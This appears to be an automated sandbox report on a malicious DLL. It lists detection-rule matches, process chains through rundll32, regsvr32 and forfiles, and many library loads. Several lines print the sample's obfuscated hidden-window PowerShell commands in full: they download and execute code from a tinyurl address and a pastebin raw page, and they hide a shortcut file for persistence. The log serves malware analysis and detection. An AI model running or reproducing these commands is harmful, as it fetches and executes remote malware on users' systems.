Source: amsi64_7180.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7352.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_5844.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_4240.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6448, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7172, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7180, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7352, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5844, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4240, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.troj.evad.winDLL@37/19@7/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5mk35nbp.5hg.ps1Jump to behavior
Source: 5UIy3bo46y.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1
Source: 5UIy3bo46y.dllReversingLabs: Detection: 50%
Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\5UIy3bo46y.dll"
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5UIy3bo46y.dll
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\5UIy3bo46y.dll,DllRegisterServer
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5UIy3bo46y.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\5UIy3bo46y.dll,DllRegisterServerJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
